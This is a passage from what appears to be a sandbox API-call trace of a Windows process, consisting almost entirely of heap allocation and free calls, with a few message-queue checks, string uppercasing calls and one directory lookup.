hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0218.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0218.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0218.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0218.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x38544e8 [0218.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0218.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0218.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0218.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0218.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0218.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0218.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0218.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0218.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0218.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721f8 [0218.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0218.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0218.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0218.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72278 [0218.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0218.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0218.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0218.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf18 [0218.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0218.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0218.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0218.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0218.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0218.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0218.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0218.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0218.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0218.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0218.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0218.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0218.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0218.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0218.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0218.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0218.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0218.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0218.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0218.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0218.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0218.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0218.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0218.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0218.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0218.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0218.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0218.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0218.802] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0218.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0218.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0218.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0218.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0218.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0218.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0218.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0218.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0218.803] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0218.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0218.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0218.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0218.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0218.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0218.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0218.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0218.803] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0218.803] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0218.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0218.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0218.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0218.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0218.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0218.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0218.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0218.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0218.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0218.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0218.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0218.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0218.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0218.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0218.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0218.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0218.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0218.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0218.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0218.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0218.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0218.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0218.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0218.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0218.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0218.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0218.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0218.804] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0218.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0218.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0218.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0218.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0218.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0218.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0218.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0218.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0218.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0218.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0218.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0218.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0218.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0218.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0218.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0218.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0218.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0218.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0218.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0218.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0218.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0218.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0218.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0218.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0218.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0218.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0218.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0218.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0218.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0218.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0218.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0218.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0218.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0218.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0218.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0218.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0218.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0218.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0218.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0218.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0218.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0218.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0218.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0218.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0218.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0218.806] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0218.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0218.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0218.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0218.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0218.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0218.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0218.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0218.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0218.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0218.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0218.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0218.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0218.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0218.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0218.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0218.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0218.807] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0218.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0218.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0218.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0218.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0218.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0218.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0218.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0218.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0218.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0218.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0218.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0218.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0218.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0218.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0218.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0218.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0218.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0218.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0218.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0218.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0218.808] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/My Shapes", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bc4716, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 0x9e2138 [0218.808] FindClose (in: hFindFile=0x9e2138 | out: hFindFile=0x9e2138) returned 1 [0218.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0218.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0218.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0218.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0218.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0218.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0218.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0218.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0218.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0218.808] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0218.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0218.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0218.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0218.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0218.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0218.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0218.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0218.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0218.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0218.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0218.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0218.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0218.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0218.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0218.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0218.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0218.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0218.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0218.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0218.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0218.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0218.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0218.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0218.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0218.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0218.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0218.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0218.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0218.810] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0218.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0218.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0218.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0218.810] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0218.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0218.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: 